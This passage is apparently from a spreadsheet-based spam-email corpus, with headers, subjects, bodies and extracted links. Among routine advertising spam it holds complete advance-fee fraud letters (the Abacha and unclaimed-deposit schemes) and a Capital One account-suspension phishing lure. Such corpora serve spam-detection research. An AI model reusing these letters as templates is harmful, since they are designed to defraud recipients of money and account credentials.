    <t>I am Tom Adams, the family lawyer to late General Sani Abacha, the \neldest son of the late president of Nigeria, General Sani Abacha. He \nwas falsely accused of murder and as such was imprisoned, but thanks to \nGod, he has been released for his innocence, presently he is under \nhouse arrest. \nWell dear friend we need your assistance in transferring some of his \nmoney into your account that are with a security firm abroad whose name \nis withheld for security reason, until you open communication with me \nbecause the government is making plans to seize them, as they did to \nhis father's own. \n\nPlease view this site and read its content carefully, \n[URL]http://news.bbc.co.uk[/URL]\n\nThe amount is $10.6 million in a Security firm abroad. All that is \nneeded is for me to instruct the company to release the funds to you \nfor safe keeping.\nWe will remunerate you with 25% of the total funds as compensation for \nyour assistance; Five percent (5%) would be set aside to take care of \nall expenses we may incur during the transaction. \nI will appreciate you accept my proposal in good faith.\n For further communication, swiftly responses through my alternative \nEmail \nAddress:\ntom_adams@donegal.net\n \n\nYours truly,\nTom Adams  Esq.\n\n\n       \n\n\n\n</t>
  </si>
  <si>
    <t>555</t>
  </si>
  <si>
    <t>To: Recipients &lt;info@bioscan.co.ke&gt;\nFrom: "CapitalOne Bank" &lt;info@bioscan.co.ke&gt;\nDate: Wed, 26 Apr 2017 21:48:09 +0000</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2017 21:48:09 +0000</t>
  </si>
  <si>
    <t>"CapitalOne Bank" &lt;info@bioscan.co.ke&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;info@bioscan.co.ke&gt;</t>
  </si>
  <si>
    <t>Capitalone Bank</t>
  </si>
  <si>
    <t>Dear Capital One Customer. Your Capital One Internet Banking account has been temporary suspended.  We require you to Unlock your account Unlock Access. Sincerely, Capital One Security Department  [URL]www.capitalone.com[/URL] Dear Capital One Customer.Your Capital One Internet Banking account has been temporary suspended. We require you to Unlock your account Unlock Access.Sincerely,Capital One Security Department [URL]www.capitalone.com[/URL]</t>
  </si>
  <si>
    <t>www.capitalone.com www.capitalone.com</t>
  </si>
  <si>
    <t>2031</t>
  </si>
  <si>
    <t>To: aiweb06@cs.umbc.edu\nFrom: eric morgan &lt;ericmorgan03@yahoo.com.hk&gt;\nDate: Wed, 26 Apr 2006 10:42:04 -0700</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2006 10:42:04 -0700</t>
  </si>
  <si>
    <t>eric morgan &lt;ericmorgan03@yahoo.com.hk&gt;</t>
  </si>
  <si>
    <t>aiweb06@cs.umbc.edu</t>
  </si>
  <si>
    <t xml:space="preserve">IN GOOD FAITH </t>
  </si>
  <si>
    <t>我有新的電郵地址！你現可電郵給我：ericmorgan03@yahoo.com.hk\n\nDR.ERIC MORGAN\n\nABIDJAN,\n\nCOTE D' IVOIRE \n\n\nDearest Beloved,\n\n\nI am Dr.Eric Morgan an account officer with Banque Internationale de L' afrique De L' Ouest Cote D' Ivoire. I am writing following an opportunity in my department here in the bank that will be of immense benefit to both of us. \n\n\nIn my department we discovered an abandoned sum of $10 million Ten million united states dollars) in an account that belongs to one of our foreign customer the Late Mr Smith B.Andrea an American oil engineer with Petro Technical Services Sarl who unfortunately lost his life in the plane crash of Alaska Airlines Flight 261 which crashed on January 31 2000, including his wife. \n\n\nYou read more on the crash on visiting this Site.[URL]http://www.cnn.com[/URL] airlines.list/smith.html.\n\n\nSince we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because we cannot release it unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines.\n\n\nUnfortunately I learnt that his supposed next of kin being his wife [Patty Andrea] died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. \n\n\nIt is therefore upon this discovery that I now decided to make business with you and release the money to you as the next of kin or beneficiary of the funds for safety keeping and subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill. \n\n\nThe banking law and guidelines here stipulates that if such money remained after six and half years, the money will then be transferred into Government treasury as unclaimed funds. \n\n\nI agree that 30% of this money will be for you as the foreign partner, while the balance will be for me. I will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. \n\n\nPlease be honest to me and trust is our watchword in this transaction. Note this transaction is confidential and risk free.\n\n\nAs soon as you receive this mail you should contact me by return mail.Please note that all necessary arrangement for the smooth release of these funds to your yet to be provided account has been finalised. \n\n\nWe will discuss much in details when I do receive your response. Please in your response include your telephone number for easy communication between us.\n\n\nBest Regards,\n\nDr Eric Morgan.\n\n\nPLEASE NOTE:\n\nThe material being sent to you contains PRIVILEGED AND CONFIDENTIAL information only for the use of the addressee(s) named above.\n\n\nIf the reader of this message is not the intended recipient, please note that any dissemination, distribution, or copying of this communication is prohibited.\n\n\nIt is requested that anyone who receives this communication in error notify the sender immediately by e-mail reply and destroy all copies of the transmission received.\n\n\nThanks!\n\nFROM DR.ERIC MORGAN\n\n- eric morgan\n\n</t>
  </si>
  <si>
    <t>2029</t>
  </si>
  <si>
    <t>To: rrrrr &lt;R@M&gt;\nFrom: Mr.David Sarr &lt;da_sarr1@katamail.com&gt;\nDate: Wed, 26 Apr 2006 06:29:37 +0100</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2006 06:29:37 +0100</t>
  </si>
  <si>
    <t>Mr.David Sarr &lt;da_sarr1@katamail.com&gt;</t>
  </si>
  <si>
    <t>rrrrr &lt;R@M&gt;</t>
  </si>
  <si>
    <t>Seeking your partnership</t>
  </si>
  <si>
    <t>\n\nMr.David Sarr\nMANAGER:ECOBANK.\nDAKAR-SENEGAL.Branch.\nEmail:da_sarr@katamail.com\nTel:  +221-4488469\n\n Dear friend,\n\n I know this email will reach you as a surprise, but need not to worry as i am using the only secured and confidential medium available to seek for foreign assistance in a business.\n I would respectfully request that you keep the contents of this mail confidential and respect the integrity of the information you come by as a result of this mail.\n I am contacting you concerning a customer and deposit placed under our banks management 10 years ago,i am contacting you independently of our investigation and no one is informed of this communication.\n I am Mr.David Saar from Ecobank,Dakar-Senegal.Branch.This business request may seem strange, but I crave your indulgence and pray you view it seriously as I am convinced that you would be capable to provide me with a solution to a money transfer.\n On 6th,june,1997, a Nigerian came to make a (fixed) deposit valued at US$10,500,000.00(Ten Million Five Hundred Thousand Dollars )in  my branch to be claimed by a foreing beneficiary to be later named,upon maturity,we sent a routine notification to his forwarding address but got no reply.\n After three years of sending reminder with no responce,we decided to open an investigation,and i was the head of the panel set up for the investigation,in the course of our investigation i finally discovered the money was Part of the loot the late Nigerian Ruler General Sani Abacha stole from Nigeria,the money was deposited under a false name. you can  confirm it yourself via the website below. \n[URL]http://www.usatoday.com[/URL]\n On further investigation, I found out that no one knows of the deposit not even his family members he died without telling any one of it.Therefore he did not declare any next of kin or relations in all his documents, including his bank deposit paperwork in my bank as the deposit was a secret one,so i decided to keep the secret to my self as i view this as a once in a lifetime oportunity for me.\n My bank has waited for the beneficiary to come and make claims but no one has ever come forward,the reason is that he was yet to name the beneficiary before he died and i am the only one aware of this fact because i am the one in charge of the transaction. \n This sum of US$10,500,000.00 and the interest is being rolled over with the  principal sum at the end of each year. No one will ever come forward to claim it According to my Country's law, at the expiration of 10(TEN)years,the money will revert to the ownership of the SENEGALESE Government if nobody  applies to claim the fund.\n Consequently, my proposal is that I will like you as a foreigner to  stand as the beneficiary to the deposit so that the money will not get into the hands of some corrupt Government officials. I assure you that I could have the deposit released to you in a few days. \n I will simply inform our bank of the final closing of the file relating to the deposit.This is simple,upon your approval,I will like you to provide immediately your full name and address so that the Attorney will prepare the necessary documents and affidavits which will put you in place as the beneficiary.\n We shall employ the service of two attorneys for the drafting and notarization of the WILL and obtain the necessary documents and letter  of probate administration in your favour for the transfer.\n Any bank account in any part of the world which you will provide will  then facilitate the transfer of this money to you as the beneficiary.\n The money will be paid into your account for us to share in ratio of 35% for me,35% for you,20% for any charity organization of our choice and 10 % will be set aside for expenses  incured during the business . \n There is no risk at all;i have waited eigth(8)years now to be very sure of this plan,the paperwork for this transaction will be done by the attorney and my position as the Branch Manager guarantees the successful execution of this transaction. If you are interested, please reply immediately via the private email address below, upon your response, I shall provide you with more details and relevant documents that will help you understand the transaction.\n Please observe outmost confidentiality and be rest assured that this  transaction would be most profitable for both of us because I shall require your assistance to invest my share in your country.\n Please upon your approval of this mail message, send to me the following  to enable me start the processing of the fund transfer into your bank account:1.) The beneficiary's name and complete info.2.) Your private / official telephone and fax number.\n I am aware of the consequences of this proposal. I ask that if you find no interest in this project that you should discard this mail. I ask that you do not be vindictive or destructive. If my offer is of no appeal to you, delete this message and forget I ever contacted you. Do not destroy my career because you do not approve of my proposal. You may not know this but people like me who have made tidy sums out of comparable situations run the whole banking sector.\n I do not find this move against good conscience, this may be hard for you to understand, but the dynamics of my industry dictates that I make this move. Such opportunities only come ones way once in a lifetime. I cannot afford to let this chance pass me by, for once I find myself in total control of my destiny. This is my chance and I won't let it pass me by.If you will not work with me let me know and let me move on with my life but please do not destroy me.I am a family man and this is an opportunity to provide my family with new opportunities. \n There is a reward for this project and it is a task well worth undertaking.I have evaluated the risks and the only risk I have here is from you refusing to work with me and alerting my bank.\n Awaiting your Urgent Reply via my private email:da_sarr@katamail.com or call me on my private telephone number: +221-4488469 for further discussion.\nThanks and God bless,\nMr.David Sarr\n\n\n</t>
  </si>
  <si>
    <t>http://www.usatoday.com</t>
  </si>
  <si>
    <t>4534</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: Blair@FrugalJoe.com\nDate: Wed, 25 Sep 2002 23:55:18 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 23:55:18 -0400</t>
  </si>
  <si>
    <t>Blair@FrugalJoe.com</t>
  </si>
  <si>
    <t>Free Shipping on all orders at Blair.com</t>
  </si>
  <si>
    <t>![]([URL]http://www.frugaljoe.com[/URL] |\n![]([URL]http://www.salealerts.com[/URL] | _** Never Pay Retail!**  \n_![]([URL]http://www.salealerts.com[/URL]  \n---|---|---  \n![]([URL]http://www.salealerts.com[/URL]  \n  \n![]([URL]http://www.blair.com[/URL]   You can\ncount on Blair.com for savings, selection and satisfaction all day,  \n  every day. Plus, for a limited time, you'll enjoy **FREE** standard shipping\non  \n  every order. So shop now!  \n  \n\n  **Women's.** Must-have fashions.  \n  **Men's.** Dress and casual favorites.  \n  **Home.** Values for every room.  \n  **Clearance.** Closeouts at 40%-75% off.  \n\n|  ![]([URL]http://www.blair.com[/URL]  \n---  \n  \n  Just click the button above to go to Blair.com and enjoy FREE shipping  \n  automatically on your entire order. (You'll see the savings at checkout.)  \n  Don't wait. **_This offer ends October 15, 2002._**  \n  \n  \n* * *\n\n* * *\n\nBLAIR 2000-2002 | 220 Hickory St., Warren, PA 16366  ![](dot.gif)  \n---  \n![]([URL]http://www.frugaljoe.com[/URL] |\n![]([URL]http://www.salealerts.com[/URL] | __  \nYou have received this email because you have subscribed through one of our\nmarketing partners. If you would like to learn more about Frugaljoe.com then\nplease visit our website [URL]www.frugaljoe.com[/URL] If this message was sent to you in\nerror, or if you would like to unsubscribe please clickhere or cut and paste\nthe following link into a web browser:  \n[URL]http://www.frugaljoe.com[/URL]\~moc.cnietonten^^mj\~1754388\~12a1  \n  \n![]([URL]http://www.salealerts.com[/URL]  \n  \n![]([URL]http://www.330w.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.frugaljoe.com http://www.salealerts.com http://www.salealerts.com http://www.salealerts.com http://www.blair.com http://www.blair.com http://www.frugaljoe.com http://www.salealerts.com www.frugaljoe.com http://www.frugaljoe.com http://www.salealerts.com http://www.330w.com</t>
  </si>
  <si>
    <t>4535</t>
  </si>
  <si>
    <t>To: &lt;bonniefelt@hotmail.com&gt;, &lt;puddin69hk@hotmail.com&gt;,\nFrom: bert_327@hotmail.com\nDate: Wed, 25 Sep 2002 23:46:33 -1600</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 23:46:33 -1600</t>
  </si>
  <si>
    <t>bert_327@hotmail.com</t>
  </si>
  <si>
    <t>&lt;bonniefelt@hotmail.com&gt;, &lt;puddin69hk@hotmail.com&gt;,</t>
  </si>
  <si>
    <t>Attn: PROTECT YOURSELF AGAINST HARMFUL VIRUSES! SONLSNAIK</t>
  </si>
  <si>
    <t>Here is an excerpt from your local newspaper.  A recent interview with a curious Computer User: Q: Is my computer supposed run this slow? A: NO, your computer should be as fast as the day you purchased it.    The solution to your problem is NORTON SYSTEMWORKS 2002. Q: I think have a Virus, what do I do? A: QUICK! Before the virus spreads and infects your entire system    you must get a copy of NORTON SYSTEMWORKS 2002! Q: I am worried that I may lose my data if my computer crashes, how    do I backup my data safely and EASILY? A: Everything for your data backup is included in NORTON SYSTEMWORKS 2002. Q: I occasionally need to send a fax with my computer, what will make    this EASIER for me? A: Winfax, the easiest to use fax software available is also included    in NORTON SYSTEMWORKS 2002! Q: This Systemworks 2002 sounds like it does ALOT for my computer, can    anyone use this software? A: Yes, it is EASY to use and tech support is included.    NORTON SYSTEMWORKS 2002 is the best software available on the market    and helps you and your PC have a better relationship! Q: Ok, but wait, it must cost a TON of money, right? A: Well, usually yes, -BUT- this is a SPECIAL OFFER. It sells at your local    computer store for $99 but it is available for a LIMITED TIME for     ONLY $29.99 &amp; FREE SHIPPING!!!! Q: WHAT A DEAL! So, HOW DO I ORDER? A: To Order, Click HERE -&gt; [URL]http://168.75.161.77[/URL] &lt;- Q: GREAT, THANKS! Q: One more question, how do I get REMOVED from this DARN EMAIL LIST? A: That is NOT a problem. Click here -&gt; [URL]http://168.75.161.77[/URL]    And you will be removed within the legal period of 5 business days. ISAPP opp code djT*&amp;204</t>
  </si>
  <si>
    <t>http://168.75.161.77 http://168.75.161.77</t>
  </si>
  <si>
    <t>4532</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - Life Pros" &lt;lp@insiq.us&gt;\nDate: Wed, 25 Sep 2002 19:01:08 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 19:01:08 -0400</t>
  </si>
  <si>
    <t>"IQ - Life Pros" &lt;lp@insiq.us&gt;</t>
  </si>
  <si>
    <t>Commissions Too High to Publish</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_1C1E03_01C264B1.C98D8800 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Non-Med Level Term 15-20 &amp; 30 year with Return of Premium Rider!	  It's Lucrative:	  	 Commission so high we can't publish them 	 Annualization Available 	 Daily Commission by EFT 	  It's Fast:	  	 Qualifying policies processed in 4 days or company pays you $100.00 	 Forms and Status from Internet 	  It's Easy:	  	 Non-medical underwriting (No Blood, No HOS, No Exam)* 	  	 Ages 0-60	 $100,000	   	 Ages 61-70	 $50,000	   	 Easy To Complete Application 	 Fax Application to Home Office (No Need to Mail Original) 	  888-574-9088	 Please fill out the form below for more information	  Name:	  	 E-mail:	  	 Phone:	  	 City:	  	State:	  	 	  	  	 	   	    	 M14070PBL602 *Issuance of the policy based on answers to medical questions We don't want anybody to receive our mailing who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL] Legal Notice    ------=_NextPart_000_1C1E03_01C264B1.C98D8800 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Commissions Too High to Publish =20    =20              =20              =20                               Commission so high we can't publish them =20                              Annualization Available  =20                              Daily Commission by EFT                =20              =20                               Qualifying policies processed in 4 days or company pays = you $100.00                =20                              Forms and Status from Internet                =20              =20                               Non-medical underwriting (No Blood, No HOS, No = Exam)* =20               Ages 0-60 $100,000 =20               Ages 61-70 $50,000 =20                               Easy To Complete Application =20                              Fax Application to Home Office (No Need to Mail = Original) =20              =20             =20                =20                    =20                        =20                           Please fill out the form below for more = information =20                           Name: =20                              =20                           E-mail: =20                              =20                           Phone: =20                              =20                           City: =20                              State: =20                              =20                             =20                                =20                              =20              =20             =20               M14070PBL602 =20             =20                 *Issuance=20                   of the policy based on answers to medical = questions                   We don't want anybody to receive our mailing who does = not wish=20                   to receive them. This is a professional communication = sent to=20                   insurance professionals. To be removed from this = mailing list,=20                   DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL] out Legal = Notice=20                  ------=_NextPart_000_1C1E03_01C264B1.C98D8800--</t>
  </si>
  <si>
    <t>4530</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: Alex@FrugalJoe.com\nDate: Wed, 25 Sep 2002 17:48:33 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 17:48:33 -0400</t>
  </si>
  <si>
    <t>Alex@FrugalJoe.com</t>
  </si>
  <si>
    <t>Got plans tonight?</t>
  </si>
  <si>
    <t>Never Pay Retail! ManWoman a Mana Woman Any  Alaska  Alabama  Arkansas  Arizona  California  Colorado  Connecticut  D.C.  Delaware  Florida  Georgia  Guam  Hawaii  Iowa  Idaho  Illinois  Indiana  Kansas  Kentucky  Louisiana  Massachusetts  Maryland  Maine  Michigan  Minnesota  Missouri  Mississippi  Montana  North Carolina  North Dakota  Nebraska  New Hampshire  New Jersey  New Mexico  Nevada  New York  Ohio  Oklahoma  Oregon  Pennsylvania  Puerto Rico  Rhode Island  South Carolina  South Dakota  Tennessee  Texas  Utah  Virginia  The Virgin Islands  Vermont  Washington  Wisconsin  West Virginia  Wyoming  ---------  Alberta  British Columbia  Manitoba  New Brunswick  Newfoundland  Northwest Territories  Nova Scotia  Ontario  Prince Edward Island  Quebec  Saskatchewan  Yukon Territory  ---------  New South Wales  Queensland  South Australia  Tasmania  Victoria  Western Australia United States  Afghanistan  Albania  Algeria  Andorra  Angola  Antigua  Argentina  Armenia  Aruba  Australia  Austria  Azerbaidjan  Bahamas  Bahrain  Bangladesh  Barbados  Belgium  Belize  Benin  Bermuda  Bhutan  Bolivia  Bosnia  Botswana  Brazil  Brunei  Bulgaria  Burkina Faso  Burma  Burundi  Cambodia  Cameroon  Canada  Cape Verde  Central Afr. Rep.  Chad  Chile  China  Colombia  Comoros  Congo  Congo (Zaire)  Costa Rica  Croatia  Cuba  Cyprus  Czech Republic  Denmark  Djibouti  Dominica  Dom. Republic  Ecuador  Egypt  El Salvador  Equatorial Guinea  Eritrea  Estonia  Ethiopia  Fiji  Finland  France  Gabon  Gambia  Georgia  Germany  Ghana  Gibraltar  Greece  Guam  Guatemala  Guinea  Guinea-Bissau  Guyana  Haiti  Honduras  Hong Kong  Hungary  Iceland  India  Indonesia  Iran  Iraq  Ireland  Israel  Italy  Ivory Coast  Jamaica  Japan  Jordan  Kazakhstan  Kenya  Kuwait  Laos  Latvia  Lebanon  Liberia  Libya  Liechtenstein  Lithuania  Luxembourg  Macau  Macedonia  Madagascar  Malawi  Malaysia  Maldives  Mali  Malta  Mauritania  Mauritius  Mexico  Moldova  Monaco  Mongolia  Morocco  Mozambique  Namibia  Nepal  Netherlands  New Zealand  Nicaragua  Niger  Nigeria  North Korea  Norway  Oman  Pakistan  Panama  Paraguay  Peru  Philippines  Poland  Portugal  Puerto Rico  Qatar  Romania  Russia  Rwanda  San Marino  Saudi Arabia  Senegal  Sierra Leone  Singapore  Slovakia  Slovenia  Somalia  South Africa  South Korea  Spain  Sri Lanka  Sudan  Sweden  Switzerland  Syria  Taiwan  Tanzania  Thailand  Togo  Trinidad  Tunisia  Turkey  Turkmenistan  Uganda  Ukraine  U.A.E.  United Kingdom  United States  Uruguay  Venezuela  Vietnam  Yemen  Yugoslavia  Zambia  Zimbabwe You have received this email because you have subscribed        through one of our marketing partners. If you would like        to learn more about Frugaljoe.com then please visit our website        [URL]www.frugaljoe.com[/URL] If this message was sent to you in error, or if you        would like to unsubscribe please click here or cut and paste the following link into a web browser:  [URL]http://www.frugaljoe.com[/URL]\~moc.cnietonten^^mj\~1754388\~12a1</t>
  </si>
  <si>
    <t>www.frugaljoe.com http://www.frugaljoe.com</t>
  </si>
  <si>
    <t>4531</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Customer Service &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Wed, 25 Sep 2002 17:23:03 -0500</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 17:23:03 -0500</t>
  </si>
  <si>
    <t>Customer Service &lt;greatoffers@sendgreatoffers.com&gt;</t>
  </si>
  <si>
    <t>Congratulations! You Get a Free Handheld Organizer!</t>
  </si>
  <si>
    <t>![]([URL]http://www.ahamembership.com[/URL]\n![]([URL]http://www.ahamembership.com[/URL]  \n---  \n|  |\n\nDear Friend,\n\nI have your Personal Digital Organizer. It's FREE, but I need to know where to\nsend it. Click Here and complete the form.\n\nOrganize your life and keep track of appointments, names and numbers with this\nmodern digital organizer. Store up to 100 important text notes and 100\nnames/numbers. Features easy to use, touch-screen technology, 10 digit\ncalculator, currency and metric converters, alarm clock and password\nprotection.  \n  \nPlus you can try all of our money-saving benefits FREE for 30 days. Act Now!\n\n|\n\n![]([URL]http://www.ahamembership.com[/URL]  \n  \n---|---  \n|\n\nYou also get a full subscription to HOME Magazine at no additional cost!  This\noffer is risk-free, registration only takes a minute and is completely secure.\nIt's that easy. Your satisfaction is guaranteed because our credibility is on\nthe line.\n\nP.S.: This offer is only valid for the next 48 hours, so Act Now!\n\n![]([URL]http://www.ahamembership.com[/URL]\n\nCopyright 2002, American Homeowners Association (AHA). All rights reserved.  \n  \n---  \n![]([URL]http://www.ahamembership.com[/URL]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www.ahamembership.com http://www.ahamembership.com http://www.ahamembership.com http://www.ahamembership.com http://www.ahamembership.com http://admanmail.com http://admanmail.com</t>
  </si>
  <si>
    <t>4524</t>
  </si>
  <si>
    <t>To: &lt;webmaster@efi.ie&gt;\nFrom: "Affordable Computer Supply" &lt;InkjetDeals@acsmsupplies.com&gt;\nDate: Wed, 25 Sep 2002 14:29:23 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 14:29:23 -0400</t>
  </si>
  <si>
    <t>"Affordable Computer Supply" &lt;InkjetDeals@acsmsupplies.com&gt;</t>
  </si>
  <si>
    <t>&lt;webmaster@efi.ie&gt;</t>
  </si>
  <si>
    <t>Printer Cartridges as low as $1.21 each!</t>
  </si>
  <si>
    <t>This is a multipart MIME message. --= Multipart Boundary 0925021429 Content-Type: text/plain; 	charset="ISO-8859-1" Content-Transfer-Encoding: 8bit You are receiving this email because you opted-in to receive special offers from OptinDeals through one of our marketing partners. If you feel you have received this email in error or do not wish to receive additional special offers, please reply to this email with the word "remove" in the subject line or follow the unsubscribe instructions below. Incredible Deals on Inkjet Cartridges! Our Prices Start as low as $1.21 Check out some of our deals:         Check our web site for all the incredible   deals         We have been selling only the best generic printer   cartridges for over 5 years, and all of our cartridges come with a 6 month   guarantee!      For your best price on cartridges shop at  [URL]http://www.inkjetrus.com[/URL]!.html HOW TO UNSUBSCRIBE: You received this e-mail because you are registered at one of our web sites, or at one of our partners' sites or are listed in one of several list subscriptions. If you do not want to receive e-mail offers, or any email marketing from us please click here --= Multipart Boundary 0925021429 Content-Type: text/html; 	charset="ISO-8859-1" Content-Transfer-Encoding: 8bit You are receiving this email because you opted-in to receive special offers from OptinDeals through one of our marketing partners. If you feel you have received this email in error or do not wish to receive additional special offers, please reply to this email with the word "remove" in the subject line or follow the unsubscribe instructions below. Incredible Deals on Inkjet Cartridges! Our Prices Start as low as $1.21 Check out some of our deals:         Check our web site for all the incredible   deals         We have been selling only the best generic printer   cartridges for over 5 years, and all of our cartridges come with a 6 month   guarantee!      For your best price on cartridges shop at  [URL]http://www.inkjetrus.com[/URL]!.html HOW TO UNSUBSCRIBE: You received this e-mail because you are registered at one of our web sites, or at one of our partners' sites or are listed in one of several list subscriptions. If you do not want to receive e-mail offers, or any email marketing from us please click here --= Multipart Boundary 0925021429--</t>
  </si>
  <si>
    <t>http://www.inkjetrus.com http://www.inkjetrus.com</t>
  </si>
  <si>
    <t>AUS</t>
  </si>
  <si>
    <t>4525</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: WebXperts@no.hostname.specified, Design@no.hostname.specified,\nDate: Wed, 25 Sep 2002 14:25:38 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 14:25:38 -0400</t>
  </si>
  <si>
    <t>WebXperts@no.hostname.specified, Design@no.hostname.specified,</t>
  </si>
  <si>
    <t>We Build The Internet.  WebXperts.com  (Design / Programming / Consultation)</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format --1d9d507a-d864-478d-ba24-917611e50332 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable WebXperts Design, Inc.    We Build The Internet. If This Flyer does not appear correctly and/or images do not appear, please = click the following link: [URL]http://www.webxperts.com[/URL]             Your email address was obtained from a purchased list. You are receiving this = from Eluxmedia LLC, and are a part of their mailing list. If you wish to = unsubscribe from this list, please click here and enter = your name into the remove box.If you have previously unsubscribed and = are still receiving this message, you may email our Abuse Control Center.    --1d9d507a-d864-478d-ba24-917611e50332--</t>
  </si>
  <si>
    <t>http://www.webxperts.com</t>
  </si>
  <si>
    <t>4526</t>
  </si>
  <si>
    <t>To: yziubpzytm@top10.bestoffersonthenet.com\nFrom: firstever001@top10.bestoffersonthenet.com\nDate: Wed, 25 Sep 2002 09:47:00 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 09:47:00 -0400</t>
  </si>
  <si>
    <t>firstever001@top10.bestoffersonthenet.com</t>
  </si>
  <si>
    <t>yziubpzytm@top10.bestoffersonthenet.com</t>
  </si>
  <si>
    <t>ADV: Are you protected? Free Life Insurance quote oefik</t>
  </si>
  <si>
    <t>Lowest rates available for term life insurance! \n  \nTake a moment and fill out our online form to see the low rate you qualify for. \n  \nSave up to 70% from regular rates! \n  \nSmokers accepted! \n  \n[URL]http://ww1.bestoffersonthenet.com[/URL]\n            \nRepresenting quality nationwide carriers. Act now!\n         \n         \n         \n         \n          \n---------------------------------------\nTo easily remove your address from the list, go to: \n[URL]http://ww1.bestoffersonthenet.com[/URL]\nPlease allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t>http://ww1.bestoffersonthenet.com http://ww1.bestoffersonthenet.com</t>
  </si>
  <si>
    <t>4517</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: &lt;Hugh6626t76@bigfoot.com&gt;\nDate: Wed, 25 Sep 2002 09:45:21 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 09:45:21 -0400</t>
  </si>
  <si>
    <t>&lt;Hugh6626t76@bigfoot.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] Create a PAYCHECK with your COMPUTER and Enjoy Cheap ISP &amp; shopping Discount.</t>
  </si>
  <si>
    <t>Hi -\n\n( [URL]http://club.4tfox.com[/URL] )\n\nYou get emails every day, offering to show you how to make money.\nMost of these emails are from people who are NOT making any money.\nAnd they expect you to listen to them?\n\nEnough.\n\nIf you want to make money with your computer, then you should\nhook up with a group that is actually DOING it.  We are making\na large, continuing income every month.  What's more - we will\nshow YOU how to do the same thing.\n\nThis business is done completely by internet and email, and you\ncan even join for free to check it out first.  If you can send\nan email, you can do this.  No special "skills" are required.\n\nHow much are we making?  Anywhere from $2000 to $9000 per month.\nWe are real people, and most of us work at this business part-time.\nBut keep in mind, we do WORK at it - I am not going to \ninsult your intelligence by saying you can sign up, do no work,\nand rake in the cash.  That kind of job does not exist.  But if\nyou are willing to put in 10-12 hours per week, this might be\njust the thing you are looking for.\n\nThis is not income that is determined by luck, or work that is\ndone FOR you - it is all based on your effort.  But, as I said,\nthere are no special skills required.  And this income is RESIDUAL -\nmeaning that it continues each month (and it tends to increase\neach month also).\n\nInterested?  I invite you to find out more.  You can get in as a\nfree member, at no cost, and no obligation to continue if you\ndecide it is not for you.  We are just looking for people who still\nhave that "burning desire" to find an opportunity that will reward\nthem incredibly well, if they work at it.\n\nTo grab a FREE ID# and have more information, simply go to the \n web address [URL]http://club.4tfox.com[/URL]  and send me an email with following \n information\n\n"Send me a free membership!"\n\nBe sure to include your:\n1. First name\n2. Last name\n3. Email address (if different from above)\n\nWe will confirm your position and send you a special report\nas soon as possible, and also Your free Member Number.\n\nIf you are not interested in tring to Earn Money,  :)\nyou are interested in the huge discount from the 140 Online Shops,\nVery Cheap ISP package and many many more,\n\nYou can also go to the web address:\n[URL]http://club.4tfox.com[/URL]\n\nThat's all there's to it.\n\nWe'll then send you info, and you can make up your own mind.\n\nLooking forward to hearing from you!\n\nSincerely, \n\nHugh Zou\n\nP.S. After having several negative experiences with network\nmarketing companies I had pretty much given up on them.\nThis is different - there is value, integrity, and a\nREAL opportunity to have your own home-based business...\nand finally make real money on the internet.\n\nDon't pass this up..you can sign up and test-drive the\nprogram for FREE.  All you need to do is get your free\nmembership.\n\nUnsubscribing: Send a blank email to: removemefromlist@bigfoot.com with\n"Remove" in the subject line.  By submitting a request for a FREE\nDHS Club Membership, I agree to accept email from the DHS Club for\nboth their consumer and business opportunities.\n\n6341syJY3-651BumD4705MRUD6-842PIIO5741fevP5-325qxvW7258Ol53\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://club.4tfox.com http://club.4tfox.com http://club.4tfox.com http://www.linux.ie</t>
  </si>
  <si>
    <t>4509</t>
  </si>
  <si>
    <t>To: &lt;social@linux.ie&gt;\nFrom: &lt;victor_murray@hotmail.com&gt;\nDate: Wed, 25 Sep 2002 04:23:33 -0700</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 04:23:33 -0700</t>
  </si>
  <si>
    <t>&lt;victor_murray@hotmail.com&gt;</t>
  </si>
  <si>
    <t>[ILUG-Social] re: how to register one of the new domain extensions</t>
  </si>
  <si>
